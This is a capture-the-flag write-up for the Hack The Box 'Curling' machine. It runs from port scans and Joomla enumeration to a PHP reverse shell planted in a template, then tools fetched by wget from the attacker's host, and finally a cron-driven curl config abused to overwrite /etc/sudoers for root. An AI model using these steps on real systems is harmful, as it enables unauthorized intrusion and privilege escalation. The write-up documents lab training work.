Curling
Ports scan
u505@kali:~/HTB/Machines/Curling$ sudo masscan -e tun0 -p1-65535,U:1-65535 10.10.10.150 --rate=1000 [sudo] password for u505:
Starting masscan 1.0.5 at 2020-02-14 14:51:53 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 22/tcp on 10.10.10.150 Discovered open port 80/tcp on 10.10.10.150
u505@kali:~/HTB/Machines/Curling$ nmap -sC -sV 10.10.10.150 Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-14 09:52 EST Nmap scan report for curling.htb (10.10.10.150) Host is up (0.039s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 8a:d1:69:b4:90:20:3e:a7:b6:54:01:eb:68:30:3a:ca (RSA) | 256 9f:0b:c2:b2:0b:ad:8f:a1:4e:0b:f6:33:79:ef:fb:43 (ECDSA) |_ 256 c1:2a:35:44:30:0c:5b:56:6a:3f:a5:cc:64:66:d9:a9 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-generator: Joomla! - Open Source Content Management |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Home Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.90 seconds
Port 80
The web page is a joomla CMS.
Joomla! Enumeration
The joomla scan doesn't provide anything very interresting except the exact Jommla! version.
u505@kali:~/HTB/Machines/Curling$ joomscan -ec -u http://10.10.10.150 ____ _____ _____ __ __ ___ ___ __ _ _ (_ _)( _ )( _ )( \/ )/ __) / __) /__\ ( \( ) .-_)( )(_)( )(_)( ) ( \__ \( (__ /(__)\ ) ( \____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_) (1337.today)
--=[OWASP JoomScan +---++---==[Version : 0.0.7 +---++---==[Update Date : [2018/09/23] +---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo --=[Code name : Self Challenge @OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP
Processing http://10.10.10.150 ...
[+] FireWall Detector [++] Firewall not detected
[+] Detecting Joomla Version [++] Joomla 3.8.8
[+] Core Joomla Vulnerability [++] Target Joomla core is not vulnerable
[+] Checking Directory Listing [++] directory has directory listing : http://10.10.10.150/administrator/components http://10.10.10.150/administrator/modules http://10.10.10.150/administrator/templates http://10.10.10.150/images/banners
[+] Checking apache info/status files [++] Readable info/status files are not found
[+] admin finder [++] Admin page : http://10.10.10.150/administrator/
[+] Checking robots.txt existing [++] robots.txt is not found
[+] Finding common backup files name [++] Backup files are not found
[+] Finding common log files name [++] error log is not found
[+] Checking sensitive config.php.x file [++] Readable config files are not found
[+] Enumeration component (com_ajax) [++] Name: com_ajax Location : http://10.10.10.150/components/com_ajax/ Directory listing is enabled : http://10.10.10.150/components/com_ajax/
[+] Enumeration component (com_banners) [++] Name: com_banners Location : http://10.10.10.150/components/com_banners/ Directory listing is enabled : http://10.10.10.150/components/com_banners/
[+] Enumeration component (com_contact) [++] Name: com_contact Location : http://10.10.10.150/components/com_contact/ Directory listing is enabled : http://10.10.10.150/components/com_contact/
[+] Enumeration component (com_content) [++] Name: com_content Location : http://10.10.10.150/components/com_content/ Directory listing is enabled : http://10.10.10.150/components/com_content/
[+] Enumeration component (com_contenthistory) [++] Name: com_contenthistory Location : http://10.10.10.150/components/com_contenthistory/ Directory listing is enabled : http://10.10.10.150/components/com_contenthistory/
[+] Enumeration component (com_fields) [++] Name: com_fields Location : http://10.10.10.150/components/com_fields/ Directory listing is enabled : http://10.10.10.150/components/com_fields/
[+] Enumeration component (com_finder) [++] Name: com_finder Location : http://10.10.10.150/components/com_finder/ Directory listing is enabled : http://10.10.10.150/components/com_finder/
[+] Enumeration component (com_mailto) [++] Name: com_mailto Location : http://10.10.10.150/components/com_mailto/ Directory listing is enabled : http://10.10.10.150/components/com_mailto/ Installed version : 3.1
[+] Enumeration component (com_media) [++] Name: com_media Location : http://10.10.10.150/components/com_media/ Directory listing is enabled : http://10.10.10.150/components/com_media/
[+] Enumeration component (com_newsfeeds) [++] Name: com_newsfeeds Location : http://10.10.10.150/components/com_newsfeeds/ Directory listing is enabled : http://10.10.10.150/components/com_newsfeeds/
[+] Enumeration component (com_search) [++] Name: com_search Location : http://10.10.10.150/components/com_search/ Directory listing is enabled : http://10.10.10.150/components/com_search/
[+] Enumeration component (com_users) [++] Name: com_users Location : http://10.10.10.150/components/com_users/ Directory listing is enabled : http://10.10.10.150/components/com_users/
[+] Enumeration component (com_wrapper) [++] Name: com_wrapper Location : http://10.10.10.150/components/com_wrapper/ Directory listing is enabled : http://10.10.10.150/components/com_wrapper/ Installed version : 3.1
Your Report : reports/10.10.10.150/
Web Enumeration
u505@kali:~/HTB/Machines/Curling$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -r -e "txt,php" -f -t 50 -u http://10.10.10.150 --plain-text-report=dirsearch.txt
_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: txt, php | HTTP method: get | Threads: 50 | Wordlist size: 13832 | Recursion level: 1
Error Log: /opt/utils/dirsearch/logs/errors-20-02-14_10-06-26.log
Target: http://10.10.10.150
[10:06:26] Starting: [10:06:30] 403 - 300B - /.htpasswd.txt [10:06:30] 403 - 300B - /.htpasswd.php [10:06:30] 403 - 291B - /.php [10:06:30] 200 - 5KB - /administrator/ [10:06:34] 200 - 31B - /bin/ [10:06:35] 200 - 31B - /cache/ [10:06:37] 200 - 31B - /components/ [10:06:38] 200 - 0B - /configuration.php [10:06:48] 403 - 293B - /icons/ [10:06:48] 200 - 31B - /images/ [10:06:48] 200 - 31B - /includes/ [10:06:48] 200 - 14KB - /index.php [10:06:48] 200 - 14KB - /index.php/ [10:06:51] 200 - 31B - /language/ [10:06:51] 200 - 31B - /layouts/ [10:06:51] 200 - 31B - /libraries/ [10:06:51] 200 - 18KB - /LICENSE.txt [10:06:53] 200 - 31B - /media/ [10:06:54] 200 - 31B - /modules/ [10:06:59] 200 - 31B - /plugins/ [10:07:02] 200 - 5KB - /README.txt [10:07:05] 200 - 17B - /secret.txt [10:07:05] 403 - 301B - /server-status/ [10:07:10] 200 - 31B - /templates/ [10:07:11] 200 - 31B - /tmp/ [10:07:14] 200 - 2KB - /web.config.txt [10:07:16] Starting: administrator/ [10:07:17] 403 - 314B - /administrator/.htpasswd.php [10:07:17] 403 - 314B - /administrator/.htpasswd.txt [10:07:17] 403 - 305B - /administrator/.php [10:07:24] 200 - 31B - /administrator/cache/ [10:07:27] 200 - 7KB - /administrator/components/ [10:07:36] 200 - 1KB - /administrator/help/ [10:07:38] 200 - 2KB - /administrator/includes/ [10:07:38] 200 - 5KB - /administrator/index.php [10:07:38] 200 - 5KB - /administrator/index.php/ [10:07:40] 200 - 1KB - /administrator/language/ [10:07:41] 200 - 31B - /administrator/logs/ [10:07:44] 200 - 4KB - /administrator/modules/ [10:07:59] 200 - 1KB - /administrator/templates/ [10:08:04] Starting: bin/ [10:08:04] 403 - 295B - /bin/.php [10:08:04] 403 - 304B - /bin/.htpasswd.txt [10:08:04] 403 - 304B - /bin/.htpasswd.php [10:08:53] Starting: cache/ [10:08:53] 403 - 297B - /cache/.php [10:08:54] 403 - 306B - /cache/.htpasswd.php [10:08:54] 403 - 306B - /cache/.htpasswd.txt [10:09:42] Starting: components/ [10:09:43] 403 - 302B - /components/.php [10:09:43] 403 - 311B - /components/.htpasswd.php [10:09:43] 403 - 311B - /components/.htpasswd.txt [10:10:30] Starting: icons/ [10:10:30] 403 - 297B - /icons/.php [10:10:30] 403 - 306B - /icons/.htpasswd.txt [10:10:31] 403 - 306B - /icons/.htpasswd.php [10:11:10] 403 - 299B - /icons/small/ [10:11:22] Starting: images/ [10:11:22] 403 - 298B - /images/.php [10:11:22] 403 - 307B - /images/.htpasswd.txt [10:11:23] 403 - 307B - /images/.htpasswd.php [10:11:29] 200 - 2KB - /images/banners/ [10:11:42] 200 - 2KB - /images/headers/ [10:12:10] Starting: includes/ [10:12:11] 403 - 309B - /includes/.htpasswd.php [10:12:11] 403 - 300B - /includes/.php [10:12:11] 403 - 309B - /includes/.htpasswd.txt [10:12:29] 200 - 0B - /includes/framework.php [10:12:59] Starting: index.php/ [10:13:13] 200 - 9KB - /index.php/01.php [10:13:13] 200 - 10KB - /index.php/03.txt [10:13:13] 200 - 10KB - /index.php/02.txt [10:13:14] 200 - 10KB - /index.php/02/ [10:13:14] 200 - 9KB - /index.php/01.txt [10:13:14] 200 - 9KB - /index.php/01/ [10:13:14] 200 - 14KB - /index.php/0/ [10:13:15] 200 - 10KB - /index.php/03/ [10:13:15] 200 - 10KB - /index.php/02.php [10:13:15] 200 - 9KB - /index.php/1.txt [10:13:16] 200 - 9KB - /index.php/1.php [10:13:16] 200 - 9KB - /index.php/1/ [10:13:18] 200 - 10KB - /index.php/2.php [10:13:18] 200 - 10KB - /index.php/2/ [10:13:18] 200 - 9KB - /index.php/1x1/ [10:13:18] 200 - 10KB - /index.php/2.txt [10:13:19] 200 - 9KB - /index.php/1x1.txt [10:13:20] 200 - 9KB - /index.php/1x1.php [10:13:22] 200 - 10KB - /index.php/3.php [10:13:22] 200 - 10KB - /index.php/3.txt [10:13:22] 200 - 10KB - /index.php/2g/ [10:13:23] 200 - 10KB - /index.php/3g.txt [10:13:23] 200 - 10KB - /index.php/2g.php [10:13:23] 200 - 10KB - /index.php/3g/ [10:13:23] 200 - 10KB - /index.php/3rdparty.txt [10:13:23] 200 - 10KB - /index.php/3rdparty/ [10:13:23] 200 - 10KB - /index.php/3/ [10:13:23] 200 - 10KB - /index.php/2g.txt [10:13:24] 200 - 10KB - /index.php/03.php [10:13:24] 200 - 10KB - /index.php/3rdparty.php [10:13:26] 200 - 10KB - /index.php/3g.php [10:17:12] 200 - 14KB - /index.php/home/ [10:17:13] 200 - 14KB - /index.php/Home/ [10:17:34] 200 - 14KB - /index.php/index.php/ [10:17:38] 200 - 14KB - /index.php/index.php [10:23:30] Starting: language/ [10:23:31] 403 - 300B - /language/.php [10:23:31] 403 - 309B - /language/.htpasswd.php [10:23:31] 403 - 309B - /language/.htpasswd.txt [10:24:20] Starting: layouts/ [10:24:21] 403 - 299B - /layouts/.php [10:24:21] 403 - 308B - /layouts/.htpasswd.php [10:24:21] 403 - 308B - /layouts/.htpasswd.txt [10:24:44] 200 - 4KB - /layouts/joomla/ [10:24:45] 200 - 959B - /layouts/libraries/ [10:24:52] 200 - 1KB - /layouts/plugins/ [10:25:07] Starting: libraries/ [10:25:08] 403 - 301B - /libraries/.php [10:25:08] 403 - 310B - /libraries/.htpasswd.php [10:25:08] 403 - 310B - /libraries/.htpasswd.txt [10:25:17] 200 - 0B - /libraries/cms.php [10:25:17] 200 - 1KB - /libraries/cms/ [10:25:27] 200 - 0B - /libraries/import.php [10:25:29] 200 - 6KB - /libraries/joomla/ [10:25:30] 200 - 3KB - /libraries/legacy/ [10:25:30] 200 - 0B - /libraries/loader.php [10:25:46] 200 - 11KB - /libraries/src/ [10:25:51] 200 - 3KB - /libraries/vendor/ [10:25:54] Starting: media/ [10:25:54] 403 - 297B - /media/.php [10:25:54] 403 - 306B - /media/.htpasswd.php [10:25:54] 403 - 306B - /media/.htpasswd.txt [10:26:04] 200 - 941B - /media/cms/ [10:26:05] 200 - 957B - /media/contacts/ [10:26:09] 200 - 1KB - /media/editors/ [10:26:19] 200 - 953B - /media/mailto/ [10:26:20] 200 - 1KB - /media/media/ [10:26:35] 200 - 1KB - /media/system/ [10:26:42] Starting: modules/ [10:26:42] 403 - 308B - /modules/.htpasswd.php [10:26:42] 403 - 299B - /modules/.php [10:26:42] 403 - 308B - /modules/.htpasswd.txt [10:27:31] Starting: plugins/ [10:27:32] 403 - 308B - /plugins/.htpasswd.txt [10:27:32] 403 - 308B - /plugins/.htpasswd.php [10:27:32] 403 - 299B - /plugins/.php [10:27:37] 200 - 2KB - /plugins/authentication/ [10:27:40] 200 - 967B - /plugins/captcha/ [10:27:43] 200 - 2KB - /plugins/content/ [10:27:46] 200 - 1KB - /plugins/editors/ [10:27:48] 200 - 965B - /plugins/extension/ [10:27:49] 200 - 4KB - /plugins/fields/ [10:27:53] 200 - 1KB - /plugins/installer/ [10:28:09] 200 - 2KB - /plugins/search/ [10:28:14] 200 - 4KB - /plugins/system/ [10:28:17] 200 - 1KB - /plugins/user/ [10:28:20] Starting: server-status/ [10:29:18] Starting: templates/ [10:29:19] 403 - 310B - /templates/.htpasswd.txt [10:29:19] 403 - 310B - /templates/.htpasswd.php [10:29:19] 403 - 301B - /templates/.php [10:30:00] 200 - 0B - /templates/system/ [10:30:05] Starting: tmp/ [10:30:06] 403 - 304B - /tmp/.htpasswd.txt [10:30:06] 403 - 295B - /tmp/.php [10:30:06] 403 - 304B - /tmp/.htpasswd.php
Task Completed
secret.txt
u505@kali:~/HTB/Machines/Curling$ curl http://curling/secret.txt Q3VybGluZzIwMTgh u505@kali:~/HTB/Machines/Curling$ echo -n "Q3VybGluZzIwMTgh" | base64 -d Curling2018!
The file provide a password :)
Post with user name
In a post there is a username floris
Access to Joomla! administration console
With the user name and the password, we have access to Joomla! administration console.
User flag
Reverse shell
We can obtain a reverse shell modifying the template source code.
u505@kali:~/HTB/Machines/Curling$ cp /usr/share/webshells/php/php-reverse-shell.php ./ u505@kali:~/HTB/Machines/Curling$ vi php-reverse-shell.php u505@kali:~/HTB/Machines/Curling$ cat php-reverse-shell.php | grep CHANGE $ip = '10.10.14.26'; // CHANGE THIS $port = 4444; // CHANGE THIS
We raise the listener
u505@kali:~/HTB/Machines/Curling$ rlwrap nc -nlvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444
Copy and paste the php-reverse shell code in the file index.php, and click on Template preview (You do not need to save the file to avoid to spoil other users :)
And the reverse shell is spawned.
u505@kali:~/HTB/Machines/Curling$ rlwrap nc -nlvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 10.10.10.150. Ncat: Connection from 10.10.10.150:50396. Linux curling 4.15.0-22-generic #24-Ubuntu SMP Wed May 16 12:15:17 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux 16:13:31 up 1:30, 0 users, load average: 0.00, 0.01, 0.95 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ python -c 'import pty; pty.spawn("/bin/bash")' /bin/sh: 1: python: not found $ python3 -c 'import pty; pty.spawn("/bin/bash")' www-data@curling:/$ stty raw -echo stty raw -echo
Obtain user password (Lateral escalation)
www-data@curling:/$ cd /home/floris www-data@curling:/home/floris$ ls -l total 12 drwxr-x--- 2 root floris 4096 May 22 2018 admin-area -rw-r--r-- 1 floris floris 1076 May 22 2018 password_backup -rw-r----- 1 floris floris 33 May 22 2018 user.txt
We cannot read the user flag but there is a readable file password_backup
www-data@curling:/home/floris$ cat password_backup 00000000: 425a 6839 3141 5926 5359 819b bb48 0000 BZh91AY&SY...H.. 00000010: 17ff fffc 41cf 05f9 5029 6176 61cc 3a34 ....A...P)ava.:4 00000020: 4edc cccc 6e11 5400 23ab 4025 f802 1960 N...n.T.#.@%...` 00000030: 2018 0ca0 0092 1c7a 8340 0000 0000 0000 ......z.@...... 00000040: 0680 6988 3468 6469 89a6 d439 ea68 c800 ..i.4hdi...9.h.. 00000050: 000f 51a0 0064 681a 069e a190 0000 0034 ..Q..dh........4 00000060: 6900 0781 3501 6e18 c2d7 8c98 874a 13a0 i...5.n......J.. 00000070: 0868 ae19 c02a b0c1 7d79 2ec2 3c7e 9d78 .h...*..}y..<~.x 00000080: f53e 0809 f073 5654 c27a 4886 dfa2 e931 .>...sVT.zH....1 00000090: c856 921b 1221 3385 6046 a2dd c173 0d22 .V...!3.`F...s." 000000a0: b996 6ed4 0cdb 8737 6a3a 58ea 6411 5290 ..n....7j:X.d.R. 000000b0: ad6b b12f 0813 8120 8205 a5f5 2970 c503 .k./... ....)p.. 000000c0: 37db ab3b e000 ef85 f439 a414 8850 1843 7..;.....9...P.C 000000d0: 8259 be50 0986 1e48 42d5 13ea 1c2a 098c .Y.P...HB....*.. 000000e0: 8a47 ab1d 20a7 5540 72ff 1772 4538 5090 .G.. .U@r..rE8P. 000000f0: 819b bb48 ...H
The file is an xxd view, we will reconstruct the original file
www-data@curling:/home/floris$ cat password_backup | cut -c 11-49 > /tmp/password_backup.hex www-data@curling:/home/floris$ cat /tmp/password_backup.hex | xxd -r -p > /tmp/password_backup.bin www-data@curling:/home/floris$ file /tmp/password_backup.bin /tmp/password_backup.bin: bzip2 compressed data, block size = 900k www-data@curling:/home/floris$ cp /tmp/password_backup.bin /tmp/password_backup.bz2 www-data@curling:/home/floris$ cd /tmp www-data@curling:/tmp$ bzip2 -d password_backup.bz2 www-data@curling:/tmp$ file password_backup password_backup: gzip compressed data, was "password", last modified: Tue May 22 19:16:20 2018, from Unix www-data@curling:/tmp$ mv password_backup password.gz www-data@curling:/tmp$ gunzip password.gz www-data@curling:/tmp$ file password password: bzip2 compressed data, block size = 900k www-data@curling:/tmp$ mv password password.bz2 www-data@curling:/tmp$ bzip2 -d password.bz2 www-data@curling:/tmp$ file password password: POSIX tar archive (GNU) www-data@curling:/tmp$ mv password password.tar www-data@curling:/tmp$ tar xvf password.tar password.txt www-data@curling:/tmp$ cat password.txt 5d<wdCbdZu)|hChXll
Login with floris
u505@kali:~/HTB/Machines/Curling$ ssh floris@curling The authenticity of host 'curling (10.10.10.150)' can't be established. ECDSA key fingerprint is SHA256:o1Cqn+GlxiPRiKhany4ZMStLp3t9ePE9GjscsUsEjWM. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 'curling,10.10.10.150' (ECDSA) to the list of known hosts. floris@curling's password: Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-22-generic x86_64)
* Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage
System information as of Fri Feb 14 16:38:15 UTC 2020
System load: 0.01 Processes: 181 Usage of /: 46.8% of 9.78GB Users logged in: 1 Memory usage: 27% IP address for ens33: 10.10.10.150 Swap usage: 0%
0 packages can be updated. 0 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Fri Feb 14 16:35:23 2020 from 10.10.14.25 floris@curling:~$ cat user.txt <USER_FLAG>
Escalation of privileges
Tools upload
u505@kali:~/HTB/Machines/Curling$ mkdir www u505@kali:~/HTB/Machines/Curling$ cd www/ u505@kali:~/HTB/Machines/Curling/www$ cp /opt/utils/pspy/pspy64 ./ u505@kali:~/HTB/Machines/Curling/www$ cp /opt/utils/LinEnum/LinEnum.sh ./ u505@kali:~/HTB/Machines/Curling/www$ sudo python -m SimpleHTTPServer 80 [sudo] password for u505: Serving HTTP on 0.0.0.0 port 80 ...
From the target machine
floris@curling:~$ wget -q http://10.10.14.26/pspy64 floris@curling:~$ wget -q http://10.10.14.26/LinEnum.sh floris@curling:~$ chmod +x pspy64 LinEnum.sh
Cron job
pspy snoops a crontab process
2020/02/14 16:56:01 CMD: UID=0 PID=6814 | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report 2020/02/14 16:56:01 CMD: UID=0 PID=6813 | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report 2020/02/14 16:56:01 CMD: UID=0 PID=6812 | sleep 1 2020/02/14 16:56:01 CMD: UID=0 PID=6811 | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input
The process curl use the configuraation from file /home/floris/admin-area/input and execute it.
u505@kali:~/HTB/Machines/Curling$ curl --help
...
-K, --config <file> Read config from a file
...
--url <url> URL to work with
...
-o, --output <file> Write to file instead of stdout
The user floris can write the file input. So we can manipulate the instructions of the file input.
floris@curling:~/admin-area$ ls -ltr total 20 -rw-rw---- 1 root floris 14236 Feb 14 19:18 report -rw-rw---- 1 root floris 25 Feb 14 19:18 input
Modify behavior of curl
We create a file in our web root of our machine
u505@kali:~/HTB/Machines/Curling/www$ vi sudo.txt u505@kali:~/HTB/Machines/Curling/www$ cat sudo.txt root ALL=(ALL:ALL) ALL floris ALL=(ALL) NOPASSWD:ALL
We manipulate the input file
floris@curling:~/admin-area$ vi input floris@curling:~/admin-area$ cat input url = "http://10.10.14.26/sudo.txt" output = /etc/sudoers
Root Flag
Once the cron is executed, we can sudo as root.
floris@curling:~/admin-area$ sudo -i
root@curling:~# whoami
root
root@curling:~# cat /root/root.txt
<ROOT_FLAG>
root@curling:~# crontab -l | grep -v "^#"
* * * * * curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
* * * * * sleep 1; cat /root/default.txt > /home/floris/admin-area/input
References
Daniel Simao 06:46, 14 February 2020 (EST)
